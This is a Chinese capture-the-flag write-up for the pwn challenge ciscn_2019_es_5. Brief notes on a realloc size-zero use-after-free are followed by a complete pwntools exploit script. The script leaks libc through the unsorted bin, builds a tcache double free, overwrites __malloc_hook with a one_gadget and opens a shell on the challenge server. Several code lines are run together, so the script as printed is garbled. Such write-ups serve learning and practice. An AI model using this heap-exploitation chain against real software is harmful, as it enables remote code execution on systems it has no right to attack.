ciscn_2019_es_5
首先,检查一下的保护机制
然后,我们用IDA分析一下
Create的时候,没有检查size,因此size可以为0
Edit的时候,调用了realloc,并且没有检查size是否为0,如果为0,则这个chunk会被free掉,但是堆指针没有从flist堆数组里移除,这就造成了UAF。
#coding:utf8
from pwn import *#sh = process('./ciscn_2019_es_5')
sh = remote('node3.buuoj.cn',25051)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget_s = 0x10a38cdef add(size,content):sh.sendlineafter('Your choice:','1')sh.sendlineafter('size?>',str(size))sh.sendafter('content:',content)def edit(index,content,have_content = True):sh.sendlineafter('Your choice:','2')sh.sendlineafter('Index:',str(index))if have_content:sh.sendafter('New content:',content)def show(index):sh.sendlineafter('Your choice:','3')sh.sendlineafter('Index:',str(index))def delete(index):sh.sendlineafter('Your choice:','4')sh.sendlineafter('Index:',str(index))#0
add(0x100,'a')
for i in range(7):add(0x100,'b')
for i in range(1,8):delete(i)
#得到unsorted bin
delete(0)
add(0x30,'a')
#泄露地址
show(0)
sh.recvuntil('Content: ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget_s
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
add(0,'') #1
#realloc释放chunk后,程序没有清空指针,因此,我们再delete一次,就实现了double free
edit(1,'',False)
delete(1)
add(0x10,p64(malloc_hook_addr))
#写malloc_hook
add(0x10,p64(one_gadget_addr))
#getshell
sh.sendlineafter('Your choice:','1')sh.interactive()